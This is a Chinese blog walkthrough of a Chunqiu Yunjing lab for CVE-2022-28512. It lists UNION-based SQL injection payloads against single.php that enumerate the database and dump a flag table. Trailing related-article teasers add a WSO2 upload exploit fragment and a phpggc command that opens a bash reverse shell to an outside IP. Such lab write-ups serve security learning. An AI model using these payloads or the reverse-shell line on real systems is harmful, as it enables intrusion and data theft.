首页 > 其他分享 >春秋云镜CVE-2022-28512

春秋云镜CVE-2022-28512

时间:2024-09-02 09:16:49浏览次数:11  
标签:php -- 云镜 single 28512 asd CVE id select

目录

1:开启靶机访问

2:根据提示确定目标点

3:访问该路径/single.php,并且id传参 发现单引号闭合

4:访问该路径/single.php,并且id传参,发现十个字段
1:开启靶机访问

2:根据提示确定目标点

3:访问该路径/single.php,并且id传参 发现单引号闭合

4:访问该路径/single.php,并且id传参,发现九个字段
/single.php?id=1'order by 10-- asd

5:使用联合查询,知道回显位
/single.php?id=1000' union select 1,2,3,4,5,6,7,8,9-- asd

6:查看数据库版本和名字
/single.php?id=1000' union select 1,version(),3,database(),5,6,7,8,9-- asd

7:查询表名,找到flag表名字
/single.php?id=1000' union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database() -- asd

8:查询字段名
/single.php?id=1000' union select 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name='flag' -- asd

9:查看字段数据,找到flag
/single.php?id=1000' union select 1,group_concat(flag),3,4,5,6,7,8,9 from flag -- asd

标签:php,--,云镜,single,28512,asd,CVE,id,select
From: https://www.cnblogs.com/Crushz-2024/p/18392122

相关文章

  • 春秋云镜CVE-2022-29464 (WSO2文件上传漏洞)
    目录一:访问靶机:2:根据提示知道可以文件上传3:两个方法一:访问靶机:2:根据提示知道可以文件上传3:我们两个方法1:使用EXPimportrequestsimporturllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)url=input("请输入URL:")file="shell.jsp"pa......
  • 春秋云镜CVE-2022-28525(ED01-CMS v20180505 存在任意文件上传漏洞)
    1:访问靶机发现是登录界面2:尝试使用弱口令爆破(明文传输)3:添加pyload并选择攻击类型字典我们随便选择的,实际情况需要实际定义爆破成功,用户名:admin密码:admin登录成功4:找到如图模块,上传图片马上传成功(上传时需要抓包改上传类型)5:使用蚁剑连接,拿到flag......
  • eladmin (文件上传+文件删除)(cve-2024-7458)
    侵权声明本文章中的所有内容(包括但不限于文字、图像和其他媒体)仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料,我们满怀敬意地承认该内容的版权归原作者所有。如果您是版权持有人,并且认为您的作品被侵犯,请通过以下方式与我们联系:[[email protected]]。我们将在确......
  • 春秋云镜 Flarum
    访问发现是个FlarumCMS框架.使用rockyou.txt爆破administrator得到密码1chris,登录后台由于题目提示Flarum上执行任意命令,搜到了P牛的文章照着打反序列化.执行命令./phpggc-ptar-bMonolog/RCE6system"bash-c'bash-i>&/dev/tcp/123.57.23.40/11110>&1'"生成t......
  • CVE2024-4577 成因梳理
    CVE-2012-1823提到PHP-CGI有关的漏洞就不得不提起CVE-2012-1823该漏洞利用php-cgi将用户传入的cgi数据中的query_string部分的-后参数当做了脚本的处理参数处理攻击者可以利用-d参数修改配置项实现远程命令执行的效果也可以-i读出源码当时这个漏洞被apache修复了修复的方......
  • OpenSSH 存在输入验证错误漏洞(CVE-2019-16905) 解决
    1、下载文件:zlib-1.2.11.tar.gzopenssh-8.3p1.tar.gzopenssl-1.1.1g.tar.gz 2、解压升级包tar--no-same-owner-zxvfzlib-1.2.11.tar.gztar--no-same-owner-zxvfopenssh-8.3p1.tar.gztar--no-same-owner-zxvfopenssl-1.1.1g.tar.gz 3、编译安装zlibcdzli......
  • [kernel] 带着问题看源码 —— 脚本是如何被 execve 调用的
    前言在《[apue]进程控制那些事儿》一文的"进程创建->exec->解释器文件"一节中,曾提到脚本文件的识别是由内核作为exec系统调用处理的一部分来完成的,并且有以下特性:指定解释器的以#! (shebang)开头的第一行长度不得超过128shebang最多只能指定一个参数shebang指......
  • 【第81课】开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&CVE复现
    免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉......
  • 【第82课】开发组件安全&Solr搜索&Shiro身份&Log4j日志&本地CVE环境复现
    免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉......
  • 春秋云镜 网鼎杯2022半决赛
    现用fscan扫一下访问发现是个wordpress,wpscan一下版本为6.2.6,使用了twentytwentyonetheme后台弱密码admin/123456登录由于存在themefileeditor,因此可以写马随便找一个php文件,写入木马.使用蚁剑连接,路径之前wpscan给出来了.得到了第一个flagflag:flag{c0af2d0......